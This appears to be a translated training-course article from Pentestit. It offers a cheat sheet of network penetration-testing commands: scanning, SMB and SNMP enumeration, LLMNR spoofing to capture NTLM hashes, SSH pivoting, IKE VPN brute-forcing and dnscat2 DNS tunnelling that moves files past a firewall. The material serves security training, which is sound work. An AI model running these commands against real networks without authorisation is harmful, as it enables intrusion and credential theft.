"Zero Security: A" - the initial level of training in the field of practical information security

One of the main activities of Pentestit is the development of specialized initial (Zero Security: A) and professional (Corporate Laboratories) training programs in the field of information security. Regardless of the training programs, their key features are relevant material and practical training in pentest laboratories, making up 80% of the total program of the course. In this article we will examine the basis of commands and useful tricks when testing for penetration of the external perimeter.

Many newbies, when working with specialized distributions (Kali Linux, BlackArch, BackBox, etc.), are confronted with a lack of knowledge of the basic command syntax and elementary tools when performing penetration testing. Indeed, there are now quite a few utilities and techniques for their use, which involuntarily "run up the eyes," what, when and in what case to use. To do this, we have prepared a brief guide to the main commands and utilities.

Pentester's Handbook Part 1

This handbook is a list of commands that you may need when conducting penetration testing. This handbook is designed in such a way that it does not provide a detailed description of the commands, but only gives working examples. For more information about the team or utility, we recommend that you study its man page or visit the official website.

This handbook is more concerned with network and infrastructure testing. Testing web applications is not covered in this reference, except for a few examples with sqlmap at the end of this tutorial.

Network configuration

Assign IP Address

ifconfig eth0 xxx.xxx.xxx.xxx/24 

Subnet Information

 ipcalc xxx.xxx.xxx.xxx/24 ipcalc xxx.xxx.xxx.xxx 255.255.255.0 

OSINT (collection of information)

WHOIS:

 whois domain-name-here.com 

Performing DNS lookup queries:

 dig @nameserver domainname.com A 

MX Record Detection:

 dig @nameserver domainname.com MX 

Performing a Zone Transfer request using DIG:

 dig @nameserver domainname.com AXFR 

DNS Transfer Zone

Windows DNS zone transfer

 nslookup -> set type=any -> ls -d blah.com 

Linux DNS zone transfer

 dig @ns1.blah.com blah.com axfr 

Email

Use Simply Email to collect mailing addresses of the specified domain from public sources (github, target site, etc.). The utility works more productively if you use a proxy and large values ​​of delays, so that google will not consider the activity suspicious and issue a captcha.

 git clone https://github.com/killswitch-GUI/SimplyEmail.git ./SimplyEmail.py -all -e TARGET-DOMAIN 

Simply Email can check for detected email addresses after collection.

Manual finger printing / banner grabbing

Getting information about SMTP service through a banner

 nc -v 192.168.1.1 25 telnet 192.168.1.1 25 

Getting a banner with NC

 nc TARGET-IP 80 GET / HTTP/1.1 Host: TARGET-IP User-Agent: Mozilla/5.0 Referrer: meh-domain <enter> 

DNS Brutfors

DNSRecon

 dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml 

Port scan

Nmap scanning with detailed output, syn method, T4 speed (suitable for LAN), obtaining information about OS version and services, traceroute and NSE scripts for found services

 nmap -v -sS -A -T4 target 

Same as above, scanning all TCP, even if the host does not respond to ICMP requests (takes longer)

 nmap -v -sS -p- -A -T4 -Pn target 

Same as above + UDP scan range (takes a lot of time)

 nmap -v -sU -sS -p- -A -T4 target 

Nmap script to detect vulnerable SMB servers (ATTENTION: unsafe = 1 may cause an error on the server)

 nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X 

Search NSE scripts by regular expressions

 ls /usr/share/nmap/scripts/* | grep ftp 

Nmap UDP scan

 nmap -sU target 

UDP Protocol Scanner

 git clone https://github.com/portcullislabs/udp-proto-scanner.git 

The command to scan IP addresses from a file across all services:

 ./udp-proto-scanner.pl -f ip.txt 

Scan a specific UDP service:

 udp-proto-scanner.pl -p ntp -f ips.txt 

Other methods for host discovery, without using nmap

Checks if a host is available by sending an ARP request:

 arping 192.168.1.1 -c 1 

Discovers IP, MAC addresses in a subnet via ARP (may be useful for checking VLANs):

 netdiscover -r 192.168.1.0/24 

Detection and operation of network services

SMB detection:

 smblookup -A target smbclient //MOUNT/share -I target -N rpcclient -U "" target enum4linux target 

Detects Windows / Samba servers in the subnet, identifies the Windows MAC address, netbios name, and workgroup / domain

 nbtscan 192.168.1.0/24 

Determining the version of SMB:

 smbclient -L //192.168.1.100 

Search SMB resources:

 nmap -T4 -v -oA shares --script=smb-enum-shares --script-args=smbuser=username,smbpass=password -p445 192.168.1.0/24 

SMB user detection:

 nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254 python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX 

RID Cycling Attack:

 ridenum.py 192.168.XXX.XXX 500 50000 dict.txt 

Metasploit module to attack RID cycling:

 use auxiliary/scanner/smb/smb_lookupsid 

Null session manual testing

Windows:

 net use \\TARGET\IPC$ "" /u:"" 

Linux:

 smbclient -L //192.168.99.131 

NBTScan unixwiz

 apt-get install nbtscan-unixwiz nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan 

LLMNR / NBT-NS Spoofing

Metasploit LLMNR / NetBIOS requests:

Substitution / modification of LLMNR / NetBIOS requests:

 auxiliary/spoof/llmnr/llmnr_response auxiliary/spoof/nbns/nbns_response 

Intercept NTLM hashes:

 auxiliary/server/capture/smb auxiliary/server/capture/http_ntlm 

To break an NTLMv2 hash, use john or hashcat.
Alternatively, you can use responder.py.

 git clone https://github.com/SpiderLabs/Responder.git python Responder.py -i local-ip -I eth0 

SNMP

Correction of SNMP values ​​in the output for easy perception:

 apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf 

SNMP detection

 snmpcheck -t 192.168.1.X -c public snmpwalk -c public -v1 192.168.1.X 1| grep hrSWRunName|cut -d* * -f snmpenum -t 192.168.1.X onesixtyone -c names -i hosts 

Defining SNMPv3 servers with nmap:

 nmap -sV -p 161 --script=snmp-info target-subnet 

Rory McCune's script helps automate the user search process for SNMPv3:

 https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb 

Metasploit dictionaries contain standard credentials for SNMP v1 and v2:

 /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 

TLS & SSL Testing

It tests everything on the selected host and outputs to the file:

 ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html 

Network

Remote port forwarding to local:

 plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP 

Ssh pivoting

 ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip 

SSH pivoting from one subnet to another:

 ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1 

(add socks4 127.0.0.1 1010 to /etc/proxychains.conf)

 proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2 

(add socks4 127.0.0.1 1011 to /etc/proxychains.conf)

Meterpreter Pivoting

 portfwd add –l 3389 –p 3389 –r target portfwd delete –l 3389 –p 3389 –r target 

VLAN Hopping

Using NCCGroups scans VLAN for Yersina simplifies the process.

 git clone https://github.com/nccgroup/vlan-hopping.git chmod 700 frogger.sh ./frogger.sh 

VPN server discovery

 ./udp-protocol-scanner.pl -p ike TARGET(s) 

Scanning a range of VPN servers:

 ./udp-protocol-scanner.pl -p ike -f ip.txt 

Use IKEForce to detect or attack a VPN server.

 pip install pyip git clone https://github.com/SpiderLabs/ikeforce.git 

Perform IKE VPN discovery with IKEForce:

 ./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic 

Bruteforce IKE VPN with IKEForce:

 ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 ike-scan ike-scan TARGET-IP ike-scan -A TARGET-IP ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key 

Tunneling traffic through DNS to bypass the firewall

dnscat2 supports “download” and “upload” commands for getting files (data or programs) to and from the target machine.
Attacking machine:

 apt-get update apt-get -y install ruby-dev git make g++ gem install bundler git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server bundle install 

Start dnscat2:

 ruby ./dnscat2.rb dnscat2> New session established: 1422 dnscat2> session -i 1422 

Attacked car:

 https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/ dnscat --host <dnscat server_ip> 

In the following articles, I will supplement the reference book with commands and tricks for exploiting vulnerabilities, brute-force network services, examples of command shells, etc.

Conclusion

In order to successfully resist attackers, it is necessary to know well the methods and tools of work, which is extremely difficult, given their rapid development. The course program is updated every 3 months (after 1 set), which allows you to provide relevant and relevant knowledge and practical skills in information security.

The uniqueness of the course program in the presentation and consolidation of the material - 20% of theory and 80% of practice. Constantly updating the methodological material and adding practical tasks, we try to give the most complete amount of information so that the course participants receive comprehensive information on current threats and methods of counteraction, open new development vectors in the field of practical information security.

View the course program.